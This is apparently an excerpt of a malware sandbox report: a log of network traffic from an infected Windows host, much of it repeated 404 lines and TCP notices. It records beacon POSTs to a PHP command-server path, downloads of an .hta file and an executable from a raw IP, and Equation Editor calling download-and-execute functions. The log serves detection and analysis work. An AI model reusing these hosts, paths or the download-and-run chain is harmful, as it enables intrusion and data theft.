                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.231
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540499
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58CAB548-6A4A-4B2C-A9AB-CA9B4D0E64E5}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: unknownHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:08:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
